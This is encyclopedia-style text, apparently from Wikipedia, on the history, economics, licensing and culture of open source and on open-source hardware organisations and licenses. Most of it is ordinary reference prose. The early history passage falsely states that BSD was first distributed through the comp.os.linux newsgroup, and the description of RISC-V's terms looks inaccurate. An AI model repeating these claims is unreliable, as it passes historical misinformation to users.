protocols. This led to the birth of the early Internet in 1969.
The sharing of source code on the Internet began when the Internet was relatively primitive, with software distributed via UUCP, Usenet, IRC, and Gopher. BSD, for example, was first widely distributed by posts to comp.os.linux on Usenet, which is also where its development was discussed. Linux followed in this model. Open source as a term emerged in the late 1990s from a group of people in the free software movement who were critical of the political agenda and moral philosophy implied in the term "free software" and sought to reframe the discourse to reflect a more commercially minded position.[14] In addition, the ambiguity of the term "free software" was seen as discouraging business adoption.[15][16] However, the ambiguity of the word "free" exists primarily in English, as it can refer to cost. The group included Christine Peterson, Todd Anderson, Larry Augustin, Jon Hall, Sam Ockman, Michael Tiemann and Eric S. Raymond. Peterson suggested "open source" at a meeting[17] held at Palo Alto, California, in reaction to Netscape's announcement in January 1998 of a source code release for Navigator.[18] Linus Torvalds gave his support the following day, and Phil Hughes backed the term in Linux Journal. Richard Stallman, the founder of the Free Software Foundation (FSF) in 1985, quickly decided against endorsing the term.[17][19] The FSF's goal was to promote the development and use of free software, which it defined as software that grants users the freedom to run, study, share, and modify the code. This concept is similar to open source but places a greater emphasis on the ethical and political aspects of software freedom. Netscape released its source code under the Netscape Public License and later under the Mozilla Public License.[20] Raymond was especially active in the effort to popularize the new term. He made the first public call to the free software community to adopt it in February 1998.[21] Shortly after, he founded the Open Source Initiative in collaboration with Bruce Perens.[17] The term gained further visibility through an event organized in April 1998 by technology publisher O'Reilly Media. Originally titled the "Freeware Summit" and later known as the "Open Source Summit",[22] the event was attended by the leaders of many of the most important free and open-source projects, including Linus Torvalds, Larry Wall, Brian Behlendorf, Eric Allman, Guido van Rossum, Michael Tiemann, Paul Vixie, Jamie Zawinski, and Eric Raymond. At that meeting, alternatives to the term "free software" were discussed. Tiemann argued for "sourceware" as a new term, while Raymond argued for "open source". The assembled developers took a vote, and the winner was announced at a press conference the same evening.[22] Some economists agree that open source is an information good[24] or "knowledge good", with original work involving a significant amount of time, money, and effort. The cost of reproducing the work is low enough that additional users may be added at zero or near zero cost – this is referred to as the marginal cost of a product. Copyright creates a monopoly, so the price charged to consumers can be significantly higher than the marginal cost of production. This allows the author to recoup the cost of making the original work. Copyright thus creates access costs for consumers who value the work more than the marginal cost but less than the initial production cost.
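The access-cost argument can be stated compactly. As a hedged sketch (the symbols $v$, $p$ and $c$ are introduced here purely for illustration and appear in no cited source), let $v$ be a consumer's valuation of the work, $c$ the marginal cost of reproduction, and $p$ the price set under copyright:

\[ \text{a consumer buys only if } v \ge p, \qquad \text{copyright sets } p > c, \]
\[ \Rightarrow\ \text{every consumer with } c \le v < p \text{ is priced out: the access cost.} \]

Under an open license the price falls toward the near-zero marginal cost of digital reproduction, so those consumers are served; the surrounding text weighs this consumption gain against the weakened incentive to recoup the initial cost of creation.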
Access costs also pose problems for authors who wish to create a derivative work—such as a copy of a software program modified to fix a bug or add a feature, or a remix of a song—but are unable or unwilling to pay the copyright holder for the right to do so. Being organized as effectively a "consumers' cooperative", open source eliminates some of the access costs of consumers and creators of derivative works by reducing the restrictions of copyright. Basic economic theory predicts that lower costs would lead to higher consumption and also more frequent creation of derivative works. Organizations such as Creative Commons host websites where individuals can file for alternative "licenses", or levels of restriction, for their works.[25] These self-made protections free the general society of the costs of policing copyright infringement. Others argue that since consumers do not pay for their copies, creators are unable to recoup the initial cost of production and thus have little economic incentive to create in the first place. By this argument, consumers would lose out because some of the goods they would otherwise purchase would not be available. In practice, content producers can choose whether to adopt a proprietary license and charge for copies, or an open license. Some goods which require large amounts of professional research and development, such as the pharmaceutical industry (which depends largely on patents, not copyright, for intellectual property protection), are almost exclusively proprietary, although increasingly sophisticated technologies are being developed on open-source principles.[26] There is evidence that open-source development creates enormous value.[27] For example, in the context of open-source hardware design, digital designs are shared for free and anyone with access to digital manufacturing technologies (e.g. RepRap 3D printers) can replicate the product for the cost of materials.[28] The original sharer may receive feedback and potentially improvements on the original design from the peer production community. Many open-source projects have a high economic value. According to the Battery Open Source Software Index (BOSS), the ten economically most important open-source projects are:[29][30] The rank given is based on activity regarding the projects in online discussions, on GitHub, on search activity in search engines, and on the influence on the labour market. Alternative arrangements have also been shown to result in good creation outside of the proprietary license model. Examples include:[citation needed] The open-source model is a decentralized software development model that encourages open collaboration,[3][33] meaning "any system of innovation or production that relies on goal-oriented yet loosely coordinated participants who interact to create a product (or service) of economic value, which they make available to contributors and noncontributors alike."[3] A main principle of open-source software development is peer production, with products such as source code, blueprints, and documentation freely available to the public. The open-source movement in software began as a response to the limitations of proprietary code.
The model is used for projects such as open-source appropriate technology[5] and open-source drug discovery.[6][7] The open-source model for software development inspired the use of the term to refer to other forms of open collaboration, such as in Internet forums,[8] mailing lists[34] and online communities.[35] Open collaboration is also thought to be the operating principle underlying a gamut of diverse ventures, including TEDx and Wikipedia.[36] Open collaboration is the principle underlying peer production, mass collaboration, and wikinomics.[3] It was observed initially in open-source software, but can also be found in many other instances, such as in Internet forums,[8] mailing lists,[34] Internet communities,[35] and many instances of open content, such as Creative Commons. It also explains some instances of crowdsourcing, collaborative consumption, and open innovation.[3] Riehle et al. define open collaboration as collaboration based on three principles of egalitarianism, meritocracy, and self-organization.[37] Levine and Prietula define open collaboration as "any system of innovation or production that relies on goal-oriented yet loosely coordinated participants who interact to create a product (or service) of economic value, which they make available to contributors and noncontributors alike."[3] This definition captures multiple instances, all joined by similar principles. For example, all of the elements – goods of economic value, open access to contribute and consume, interaction and exchange, purposeful yet loosely coordinated work – are present in an open-source software project, in Wikipedia, or in a user forum or community. They can also be present in a commercial website that is based on user-generated content. In all of these instances of open collaboration, anyone can contribute and anyone can freely partake in the fruits of sharing, which are produced by interacting participants who are loosely coordinated. An annual conference dedicated to the research and practice of open collaboration is the International Symposium on Wikis and Open Collaboration (OpenSym, formerly WikiSym).[38] As per its website, the group defines open collaboration as "collaboration that is egalitarian (everyone can join, no principled or artificial barriers to participation exist), meritocratic (decisions and status are merit-based rather than imposed) and self-organizing (processes adapt to people rather than people adapt to pre-defined processes)."[39] Open source promotes universal access via an open-source or free license to a product's design or blueprint, and universal redistribution of that design or blueprint.[8][9] Before the phrase open source became widely adopted, developers and producers used a variety of other terms. Open source gained hold in part due to the rise of the Internet.[40] The open-source software movement arose to clarify copyright, licensing, domain, and consumer issues. An open-source license is a type of license for computer software and other products that allows the source code, blueprint or design to be used, modified or shared (with or without modification) under defined terms and conditions.[41][42] This allows end users and commercial companies to review and modify the source code, blueprint or design for their own customization, curiosity or troubleshooting needs. Open-source licensed software is mostly available free of charge, though this does not necessarily have to be the case.
Licenses which only permit non-commercial redistribution, or modification of the source code for personal use only, are generally not considered open-source licenses. However, open-source licenses may have some restrictions, particularly regarding the expression of respect for the origin of software, such as a requirement to preserve the name of the authors and a copyright statement within the code, or a requirement to redistribute the licensed software only under the same license (as in a copyleft license). One popular set of open-source software licenses are those approved by the Open Source Initiative (OSI) based on their Open Source Definition (OSD). Social and political views have been affected by the growth of the concept of open source. Advocates in one field often support the expansion of open source in other fields. But Eric Raymond and other founders of the open-source movement have sometimes publicly argued against speculation about applications outside software, saying that strong arguments for software openness should not be weakened by overreaching into areas where the story may be less compelling. The broader impact of the open-source movement, and the extent of its role in the development of new information sharing procedures, remain to be seen. The open-source movement has inspired increased transparency and liberty in biotechnology research, for example CAMBIA.[43] Even the research methodologies themselves can benefit from the application of open-source principles.[44] It has also given rise to the rapidly expanding open-source hardware movement. Open-source software is software whose source code is published and made available to the public, enabling anyone to copy, modify and redistribute the source code without paying royalties or fees.[45] LibreOffice and the GNU Image Manipulation Program are examples of open source software. As they do with proprietary software, users must accept the terms of a license when they use open source software—but the legal terms of open source licenses differ dramatically from those of proprietary licenses. Open-source code can evolve through community cooperation. These communities are composed of individual programmers as well as large companies. Some of the individual programmers who start an open-source project may end up establishing companies offering products or services incorporating open-source programs.[citation needed] Examples of open-source software products are:[46] The Google Summer of Code, often abbreviated to GSoC, is an international annual program in which Google awards stipends to contributors who successfully complete a free and open-source software coding project during the summer. GSoC is a large-scale project with 202 participating organizations in 2021.[47] There are similar smaller-scale projects, such as the Talawa Project[48] run by the Palisadoes Foundation (a nonprofit based in California, originally created to promote the use of information technology in Jamaica, but now also supporting underprivileged communities in the US).[49] Open-source hardware is hardware whose initial specification, usually in a software format, is published and made available to the public, enabling anyone to copy, modify and redistribute the hardware and source code without paying royalties or fees. Open-source hardware evolves through community cooperation. These communities are composed of individual hardware/software developers, hobbyists, as well as very large companies.
Examples of open-source hardware initiatives are: Some publishers of open-access journals have argued that data from food science and gastronomy studies should be freely available to aid reproducibility.[54] A number of people have published Creative Commons licensed recipe books.[55] An open-source robot is a robot whose blueprints, schematics, or source code are released under an open-source model. Free and open-source software (FOSS) or free/libre and open-source software (FLOSS) is openly shared source code that is licensed without any restrictions on usage, modification, or distribution.[citation needed] Confusion persists about this definition because the "free", also known as "libre", refers to the freedom of the product, not the price, expense, cost, or charge. For example, "being free to speak" is not the same as "free beer".[19] Conversely, Richard Stallman argues the "obvious meaning" of the term "open source" is that the source code is public/accessible for inspection, without necessarily any other rights granted, although the proponents of the term say the conditions in the Open Source Definition must be fulfilled.[81] "Free and open" should not be confused with public ownership (state ownership), deprivatization (nationalization), anti-privatization (anti-corporate activism), or transparent behavior.[citation needed] Generally, open source refers to a computer program in which the source code is available to the general public for use for any (including commercial) purpose, or modification from its original design. Open-source code is meant to be a collaborative effort, where programmers improve upon the source code and share the changes within the community. Code is released under the terms of a software license. Depending on the license terms, others may then download, modify, and publish their version (fork) back to the community. The rise of open-source culture in the 20th century resulted from a growing tension between creative practices that require access to content that is often copyrighted, and restrictive intellectual property laws and policies governing access to copyrighted content. The two main ways in which intellectual property laws became more restrictive in the 20th century were extensions to the term of copyright (particularly in the United States) and penalties, such as those articulated in the Digital Millennium Copyright Act (DMCA), placed on attempts to circumvent anti-piracy technologies.[82] Although artistic appropriation is often permitted under fair-use doctrines, the complexity and ambiguity of these doctrines create an atmosphere of uncertainty among cultural practitioners. Also, the protective actions of copyright owners create what some call a "chilling effect" among cultural practitioners.[83] The idea of an "open-source" culture runs parallel to "Free Culture", but is substantively different. Free culture is a term derived from the free software movement, and in contrast to that vision of culture, proponents of open-source culture (OSC) maintain that some intellectual property law needs to exist to protect cultural producers. Yet they propose a more nuanced position than corporations have traditionally sought. Instead of seeing intellectual property law as an expression of instrumental rules intended to uphold either natural rights or desirable outcomes, an argument for OSC takes into account diverse goods (as in "the Good life"[clarification needed]) and ends.
Sites such as ccMixter offer up free web space for anyone willing to license their work under a Creative Commons license. The resulting cultural product is then available to download free (generally accessible) to anyone with an Internet connection.[84] Older, analog technologies such as the telephone or television have limitations on the kind of interaction users can have. Through various technologies such as peer-to-peer networks and blogs, cultural producers can take advantage of vast social networks to distribute their products. As opposed to traditional media distribution, redistributing digital media on the Internet can be virtually costless. Technologies such as BitTorrent and Gnutella take advantage of various characteristics of the Internet protocol (TCP/IP) in an attempt to totally decentralize file distribution. Open-source ethics is split into two strands: Irish philosopher Richard Kearney has used the term "open-source Hinduism" to refer to the way historical figures such as Mohandas Gandhi and Swami Vivekananda worked upon this ancient tradition.[88] Open-source journalism formerly referred to the standard journalistic techniques of news gathering and fact checking, reflecting open-source intelligence, a similar term used in military intelligence circles. Now, open-source journalism commonly refers to forms of innovative publishing of online journalism, rather than the sourcing of news stories by a professional journalist. In the 25 December 2006 issue of TIME magazine this is referred to as user-created content and listed alongside more traditional open-source projects such as OpenSolaris and Linux. Weblogs, or blogs, are another significant platform for open-source culture. Blogs consist of periodic, reverse chronologically ordered posts, using a technology that makes webpages easily updatable with no understanding of design, code, or file transfer required. While corporations, political campaigns and other formal institutions have begun using these tools to distribute information, many blogs are used by individuals for personal expression, political organizing, and socializing. Some, such as LiveJournal or WordPress, use open-source software that is open to the public and can be modified by users to fit their own tastes. Whether the code is open or not, this format represents a nimble tool for people to borrow and re-present culture; whereas traditional websites made the illegal reproduction of culture difficult to regulate, the mutability of blogs makes "open sourcing" even more uncontrollable since it allows a larger portion of the population to replicate material more quickly in the public sphere. Messageboards are another platform for open-source culture. Messageboards (also known as discussion boards or forums) are places online where people with similar interests can congregate and post messages for the community to read and respond to. Messageboards sometimes have moderators who enforce community standards of etiquette such as banning spammers. Other common board features are private messages (where users can send messages to one another) as well as chat (a way to have a real-time conversation online) and image uploading. Some messageboards use phpBB, which is a free open-source package. Where blogs are more about individual expression and tend to revolve around their authors, messageboards are about creating a conversation among their users, where information can be shared freely and quickly.
Messageboards are a way to remove intermediaries from everyday life—for instance, instead of relying on commercials and other forms of advertising, one can ask other users for frank reviews of a product, movie or CD. By removing the cultural middlemen, messageboards help speed the flow of information and exchange of ideas. OpenDocument is an open document file format for saving and exchanging editable office documents such as text documents (including memos, reports, and books), spreadsheets, charts, and presentations. Organizations and individuals that store their data in an open format such as OpenDocument avoid being locked into a single software vendor, leaving them free to switch software if their current vendor goes out of business, raises their prices, changes their software, or changes their licensing terms to something less favorable. Open-source movie production is either an open call system in which a changing crew and cast collaborate in movie production, a system in which the result is made available for re-use by others, or one in which exclusively open-source products are used in the production. The 2006 movie Elephants Dream is said to be the "world's first open movie",[89] created entirely using open-source technology. An open-source documentary film has a production process allowing the open contributions of archival material, footage, and other filmic elements, both in unedited and edited form, similar to crowdsourcing. By doing so, on-line contributors become part of the process of creating the film, helping to influence the editorial and visual material to be used in the documentary, as well as its thematic development. The first open-source documentary film is the non-profit WBCN and the American Revolution, which went into development in 2006, and will examine the role media played in the cultural, social and political changes from 1968 to 1974 through the story of radio station WBCN-FM in Boston.[90][91][92][93] The film is being produced by Lichtenstein Creative Media and the non-profit Center for Independent Documentary. Open Source Cinema is a website to create Basement Tapes, a feature documentary about copyright in the digital age, co-produced by the National Film Board of Canada.[94] Open-source film-making refers to a form of film-making that takes a method of idea formation from open-source software, but in this case the 'source' for a filmmaker is raw unedited footage rather than programming code. It can also refer to a method of film-making where the process of creation is 'open', i.e. a disparate group of contributors, at different times, contribute to the final piece. Open-IPTV is IPTV that is not limited to one recording studio, production studio, or cast. Open-IPTV uses the Internet or other means to pool efforts and resources together to create an online community that all contributes to a show. Within the academic community, there is discussion about expanding what could be called the "intellectual commons" (analogous to the Creative Commons). Proponents of this view have hailed the Connexions Project at Rice University, the OpenCourseWare project at MIT, Eugene Thacker's article on "open-source DNA", the "Open Source Cultural Database", Salman Khan's Khan Academy and Wikipedia as examples of applying open source outside the realm of computer software. Open-source curricula are instructional resources whose digital source can be freely used, distributed and modified. Another strand to the academic community is in the area of research.
Many funded research projects produce software as part of their work. Due to the benefits of sharing software openly in scientific endeavours,[95] there is an increasing interest in making the outputs of research projects available under an open-source license. In the UK the Joint Information Systems Committee (JISC) has developed a policy on open-source software. JISC also funds a development service called OSS Watch, which acts as an advisory service for higher and further education institutions wishing to use, contribute to and develop open-source software. On 30 March 2010, President Barack Obama signed the Health Care and Education Reconciliation Act, which included $2 billion over four years to fund the TAACCCT program, which is described as "the largest OER (open education resources) initiative in the world and uniquely focused on creating curricula in partnership with industry for credentials in vocational industry sectors like manufacturing, health, energy, transportation, and IT".[96] The principle of sharing pre-dates the open-source movement; for example, the free sharing of information has been institutionalized in the scientific enterprise since at least the 19th century. Open-source principles have always been part of the scientific community. The sociologist Robert K. Merton described the four basic elements of the community—universalism (an international perspective), communalism (sharing information), objectivity (removing one's personal views from the scientific inquiry) and organized skepticism (requirements of proof and review)—that describe the (idealised) scientific community. These principles are, in part, complemented by US law's focus on protecting expression and method but not the ideas themselves. There is also a tradition of publishing research results to the scientific community instead of keeping all such knowledge proprietary. One of the recent initiatives in scientific publishing has been open access—the idea that research should be published in such a way that it is free and available to the public. There are currently many open access journals where the information is available free online, however most journals do charge a fee (either to users or libraries for access). The Budapest Open Access Initiative is an international effort with the goal of making all research articles available free on the Internet. The National Institutes of Health has recently proposed a policy on "Enhanced Public Access to NIH Research Information". This policy would provide a free, searchable resource of NIH-funded results to the public and other international repositories six months after initial publication. The NIH's move is an important one because there is a significant amount of public funding in scientific research. Many of the questions have yet to be answered—the balancing of profit vs. public access, and ensuring that desirable standards and incentives do not diminish with a shift to open access. Benjamin Franklin was an early contributor, eventually donating all his inventions, including the Franklin stove, bifocals, and the lightning rod, to the public domain. New NGO communities are starting to use open-source technology as a tool. One example is the Open Source Youth Network started in 2007 in Lisbon by ISCA members.[97] Open innovation is also a new emerging concept which advocates putting R&D in a common pool. The Eclipse platform openly presents itself as an open innovation network.[98] Copyright protection is used in the performing arts and even in athletic activities.
Some groups have attempted to remove copyright from such practices.[99] In 2012, Russian music composer, scientist and Russian Pirate Party member Victor Argonov presented detailed raw files of his electronic opera "2032"[100] under the free license CC BY-NC 3.0 (later relicensed under CC BY-SA 4.0[101]). This opera was originally composed and published in 2007 by the Russian label MC Entertainment as a commercial product, but then the author changed its status to free. In his blog[102] he said that he decided to open the raw files (including wav, midi and other used formats) to the public to support worldwide pirate actions against SOPA and PIPA. Several Internet resources called "2032" the first open-source musical opera in history.[103][104][105][106] Notable events and applications that have been developed via the open-source community, and echo the ideologies of the open-source movement,[107] include the Open Education Consortium, Project Gutenberg, synthetic biology, and Wikipedia. The Open Education Consortium is an organization composed of various colleges that support open source and share some of their material online. This organization, headed by the Massachusetts Institute of Technology, was established to aid in the exchange of open-source educational materials. Wikipedia is a user-generated online encyclopedia with sister projects in academic areas, such as Wikiversity—a community dedicated to the creation and exchange of learning materials.[108][failed verification] Prior to the existence of Google Scholar Beta, Project Gutenberg was the first supplier of electronic books and the first free library project.[108][failed verification] Synthetic biology is a new technology that promises to enable cheap, lifesaving new drugs, as well as helping to yield biofuels that may help to solve our energy problem. Although synthetic biology has not yet come out of its lab stage, it has the potential to become industrialized in the near future. To industrialize open-source science, there are some scientists who are trying to build their own brand of it.[109] The open-access movement is a movement that is similar in ideology to the open-source movement. Members of this movement maintain that academic material should be readily available to provide help with "future research, assist in teaching and aid in academic purposes." The open-access movement aims to eliminate subscription fees and licensing restrictions of academic materials.[110] The free-culture movement is a movement that seeks to achieve a culture that engages in collective freedom via freedom of expression, free public access to knowledge and information, full demonstration of creativity and innovation in various arenas, and promotion of citizen liberties.[111][citation needed] Creative Commons is an organization that "develops, supports, and stewards legal and technical infrastructure that maximizes digital creativity, sharing, and innovation." It encourages the use of protected properties online for research, education, and creative purposes in pursuit of universal access.
Creative Commons provides an infrastructure through a set of copyright licenses and tools that creates a better balance within the realm of "all rights reserved" properties.[112] The Creative Commons license offers a slightly more lenient alternative to "all rights reserved" copyrights for those who do not wish to exclude the use of their material.[113] The Zeitgeist Movement (TZM) is an international social movement that advocates a transition into a sustainable "resource-based economy" based on collaboration, in which monetary incentives are replaced by commons-based ones, with everyone having access to everything (from code to products) as in "open source everything".[114][115] While its activism and events are typically focused on media and education, TZM is a major supporter of open-source projects worldwide, since they allow for uninhibited advancement of science and technology, independent of constraints posed by institutions of patenting and capitalist investment.[116] The P2P Foundation is an "international organization focused on studying, researching, documenting and promoting peer to peer practices in a very broad sense." Its objectives incorporate those of the open-source movement, whose principles are integrated in a larger socio-economic model.[117]
https://en.wikipedia.org/wiki/Open_source
Open-source hardware (OSH, OSHW) consists of physical artifacts of technology designed and offered by the open-design movement. Both free and open-source software (FOSS) and open-source hardware are created by this open-source culture movement and apply a like concept to a variety of components. It is sometimes, thus, referred to as free and open-source hardware (FOSH), meaning that the design is easily available ("open") and that it can be used, modified and shared freely ("free").[citation needed] The term usually means that information about the hardware is easily discerned so that others can make it – coupling it closely to the maker movement.[1] Hardware design (i.e. mechanical drawings, schematics, bills of material, PCB layout data, HDL source code[2] and integrated circuit layout data), in addition to the software that drives the hardware, are all released under free/libre terms. The original sharer gains feedback and potentially improvements on the design from the FOSH community. There is now significant evidence that such sharing can drive a high return on investment for the scientific community.[3] It is not enough to merely use an open-source license; an open-source product or project will follow open-source principles, such as modular design and community collaboration.[4][5][6] Since the rise of reconfigurable programmable logic devices, sharing of logic designs has been a form of open-source hardware. Instead of the schematics, hardware description language (HDL) code is shared. HDL descriptions are commonly used to set up system-on-a-chip systems either in field-programmable gate arrays (FPGA) or directly in application-specific integrated circuit (ASIC) designs. HDL modules, when distributed, are called semiconductor intellectual property cores, also known as IP cores. Open-source hardware also helps alleviate the issue of proprietary device drivers for the free and open-source software community; however, it is not a prerequisite for it, and should not be confused with the concept of open documentation for proprietary hardware, which is already sufficient for writing FLOSS device drivers and complete operating systems.[7][8] The difference between the two concepts is that OSH includes both the instructions on how to replicate the hardware itself as well as the information on communication protocols that the software (usually in the form of device drivers) must use in order to communicate with the hardware (often called register documentation, or open documentation for hardware[7]), whereas open-source-friendly proprietary hardware would only include the latter without including the former. The first hardware-focused "open source" activities were started around 1997 by Bruce Perens, creator of the Open Source Definition, co-founder of the Open Source Initiative, and a ham radio operator. He launched the Open Hardware Certification Program, which had the goal of allowing hardware manufacturers to self-certify their products as open.[9][10] Shortly after the launch of the Open Hardware Certification Program, David Freeman announced the Open Hardware Specification Project (OHSpec), another attempt at licensing hardware components whose interfaces are available publicly and of creating an entirely new computing platform as an alternative to proprietary computing systems.[11] In early 1999, Sepehr Kiani, Ryan Vallance and Samir Nayfeh joined efforts to apply the open-source philosophy to machine design applications.
Together they established the Open Design Foundation (ODF)[12] as a non-profit corporation and set out to develop an Open Design Definition. However, most of these activities faded out after a few years. A "Free Hardware" organization, known as FreeIO, was started in the late 1990s by Diehl Martin, who also launched a FreeIO website in early 2000. In the early to mid 2000s, FreeIO was a focus of free/open hardware designs released under the GNU General Public License. The FreeIO project advocated the concept of Free Hardware and proposed four freedoms that such hardware provided to users, based on the similar freedoms provided by free software licenses.[13] The designs gained some notoriety due to Martin's naming scheme, in which each free hardware project was given the name of a breakfast food such as Donut, Flapjack, Toast, etc. Martin's projects attracted a variety of hardware and software developers as well as other volunteers. Development of new open hardware designs at FreeIO ended in 2007 when Martin died of pancreatic cancer, but the existing designs remain available from the organization's website.[14] By the mid 2000s open-source hardware again became a hub of activity due to the emergence of several major open-source hardware projects and companies, such as OpenCores, RepRap (3D printing), Arduino, Adafruit, SparkFun, and Open Source Ecology. In 2007, Perens reactivated the openhardware.org website, but as of February 2025 it is inactive. Following the Open Graphics Project, an effort to design, implement, and manufacture a free and open 3D graphics chip set and reference graphics card, Timothy Miller suggested the creation of an organization to safeguard the interests of the Open Graphics Project community. Thus, Patrick McNamara founded the Open Hardware Foundation (OHF) in 2007.[15] The Tucson Amateur Packet Radio Corporation (TAPR), founded in 1982 as a non-profit organization of amateur radio operators with the goals of supporting R&D efforts in the area of amateur digital communications, created in 2007 the first open hardware license, the TAPR Open Hardware License. The OSI president Eric S. Raymond expressed some concerns about certain aspects of the OHL and decided not to review the license.[16] Around 2010, in the context of the Freedom Defined project, the Open Hardware Definition was created as the collaborative work of many[17] and is accepted as of 2016 by dozens of organizations and companies.[18] In July 2011, CERN (European Organization for Nuclear Research) released an open-source hardware license, CERN OHL.
Javier Serrano, an engineer at CERN's Beams Department and the founder of the Open Hardware Repository, explained: "By sharing designs openly, CERN expects to improve the quality of designs through peer review and to guarantee their users – including commercial companies – the freedom to study, modify and manufacture them, leading to better hardware and less duplication of efforts".[19] While initially drafted to address CERN-specific concerns, such as tracing the impact of the organization's research, in its current form it can be used by anyone developing open-source hardware.[20] Following the 2011 Open Hardware Summit, and after heated debates on licenses and what constitutes open-source hardware, Bruce Perens abandoned the OSHW Definition and the concerted efforts of those involved with it.[21] Openhardware.org, led by Bruce Perens, promoted and identified practices that met all the combined requirements of the Open Source Hardware Definition, the Open Source Definition, and the Four Freedoms of the Free Software Foundation.[22] Since 2014 openhardware.org has not been online and appears to have ceased activity.[23] The Open Source Hardware Association (OSHWA) at oshwa.org acts as a hub of open-source hardware activity of all genres, while cooperating with other entities such as TAPR, CERN, and OSI. The OSHWA was established as an organization in June 2012 in Delaware and filed for tax exemption status in July 2013.[24] After some debates about trademark interferences with the OSI, in 2012 the OSHWA and the OSI signed a co-existence agreement.[25][26] The FOSSi Foundation was founded in 2015 as a UK-based non-profit to promote and protect the open-source silicon chip movement, roughly a year after the official release of the RISC-V architecture.[27] The Free Software Foundation has suggested an alternative "free hardware" definition derived from the Four Freedoms.[28][29] The term hardware in open-source hardware has historically been used in opposition to the term software of open-source software; that is, to refer to the electronic hardware on which the software runs (see previous section). However, as more and more non-electronic hardware products are made open source (for example WikiHouse, OpenBeam or Hovalin), this term tends to be used in its broader sense of "physical product". The field of open-source hardware has been shown to go beyond electronic hardware and to cover a larger range of product categories such as machine tools, vehicles and medical equipment.[30] In that sense, hardware refers to any form of tangible product, be it electronic hardware, mechanical hardware, textile or even construction hardware. The Open Source Hardware (OSHW) Definition 1.0 defines hardware as "tangible artifacts — machines, devices, or other physical things".[31] Electronics is one of the most popular types of open-source hardware. PCB-based designs can be published similarly to software as CAD files, which users can send directly to PCB fabrication companies to receive hardware in the mail. Alternatively, users can obtain components and solder them together themselves. There are many companies that provide large varieties of open-source electronics, such as SparkFun, Adafruit, and Seeed. In addition, there are NPOs and companies that provide a specific open-source electronic component, such as the Arduino electronics prototyping platform.
There are many examples of specialty open-source electronics, such as a low-cost voltage and current GMAW open-source 3-D printer monitor[32][33] and a robotics-assisted mass spectrometry assay platform.[34][35] Open-source electronics finds various uses, including automation of chemical procedures.[36][37] Open-standard chip designs are now common. OpenRISC (2000, LGPL/GPL), OpenSPARC (2005, GPLv2), and RISC-V (2010, an open standard, free to implement for non-commercial purposes) are examples of free-to-use instruction set architectures. OpenCores is a large library of standard chip design subcomponents which can be combined into larger designs. Complete open-source software stacks and shuttle fabrication services are now available which can take OSH chip designs from hardware description languages to masks and ASIC fabrication on maker-scale budgets.[38] Purely mechanical OSH designs include mechanical components, machine tools, and vehicles. Open Source Ecology is a large project which seeks to develop a complete ecosystem of mechanical tools and components which aim to be able to replicate themselves. Open-source vehicles have also been developed, including bicycles like XYZ Space Frame Vehicles and cars such as the Tabby OSVehicle. Most OSH systems combine elements of electronics and mechanics to form mechatronic systems. A large range of open-source mechatronic products have been developed, including machine tools, musical instruments, and medical equipment.[30] Examples of open-source machine tools include 3D printers such as RepRap, Prusa, and Ultimaker, 3D printer filament extruders such as the Polystruder XR PRO,[39] as well as the laser cutter Lasersaur. Examples of open-source medical equipment include open-source ventilators, the echo-stethoscope echOpen (co-founded by Mehdi Benchoufi, Olivier de Fresnoye, Pierre Bourrier and Luc Jonveaux[40]), and a wide range of prosthetic hands listed in the review study by Ten Kate et al.[41] (e.g. OpenBionics' Prosthetic Hands). Open-source robotics combines open-source hardware mechatronics with open-source AI and control software. Due to the mixture of hardware and software, it serves as a particularly active area for open-source ideas to move between them. Examples of open-source hardware products can also be found, to a lesser extent, in construction (WikiHouse), textile (Kit Zéro Kilomètres), and firearms (3D printed firearm, Defense Distributed). Rather than creating a new license, some open-source hardware projects use existing free and open-source software licenses.[42] These licenses may not accord well with patent law.[43] Later, several new licenses were proposed, designed to address issues specific to hardware design.[44] In these licenses, many of the fundamental principles expressed in open-source software (OSS) licenses have been "ported" to their counterpart hardware projects. New hardware licenses are often explained as the "hardware equivalent" of a well-known OSS license, such as the GPL, LGPL, or BSD license. Despite superficial similarities to software licenses, most hardware licenses are fundamentally different: by nature, they typically rely more heavily on patent law than on copyright law, as many hardware designs are not copyrightable.[45] Whereas a copyright license may control the distribution of the source code or design documents, a patent license may control the use and manufacturing of the physical device built from the design documents. This distinction is explicitly mentioned in the preamble of the TAPR Open Hardware License: "...
those who benefit from an OHL design may not bring lawsuits claiming that design infringes their patents or other intellectual property." Noteworthy licenses include: The Open Source Hardware Association recommends seven licenses which follow their open-source hardware definition.[51] From the general copyleft licenses, the GNU General Public License (GPL) and Creative Commons Attribution-ShareAlike license; from the hardware-specific copyleft licenses, the CERN Open Hardware License (OHL) and TAPR Open Hardware License (OHL); and from the permissive licenses, the FreeBSD license, the MIT license, and the Creative Commons Attribution license.[52] Openhardware.org recommended in 2012 the TAPR Open Hardware License, Creative Commons BY-SA 3.0 and the GPL 3.0 license.[53] Organizations tend to rally around a shared license. For example, OpenCores prefers the LGPL or a Modified BSD License,[54] FreeCores insists on the GPL,[55] the Open Hardware Foundation promotes "copyleft or other permissive licenses",[56] the Open Graphics Project uses[57] a variety of licenses, including the MIT license, GPL, and a proprietary license,[58] and the Balloon Project wrote their own license.[59] The adjective "open-source" not only refers to a specific set of freedoms applying to a product, but also generally presupposes that the product is the object or the result of a "process that relies on the contributions of geographically dispersed developers via the Internet."[60] In practice, however, in both fields of open-source hardware and open-source software, products may either be the result of a development process performed by a closed team in a private setting or by a community in a public environment, the first case being more frequent than the second, which is more challenging.[30] Establishing a community-based product development process faces several challenges: finding appropriate product data management tools, documenting not only the product but also the development process itself, accepting the loss of ubiquitous control over the project, and ensuring continuity despite the fickle participation of volunteer project members, among others.[61] One of the major differences between developing open-source software and developing open-source hardware is that hardware results in tangible outputs, which cost money to prototype and manufacture. As a result, the phrase "free as in speech, not as in beer",[62] more formally known as gratis versus libre, distinguishes between the idea of zero cost and the freedom to use and modify information. While open-source hardware faces challenges in minimizing cost and reducing financial risks for individual project developers, some community members have proposed models to address these needs.[63] Given this, there are initiatives to develop sustainable community funding mechanisms, such as the Open Source Hardware Central Bank. Extensive discussion has taken place on ways to make open-source hardware as accessible as open-source software. Providing clear and detailed product documentation is an essential factor facilitating product replication and collaboration in hardware development projects.
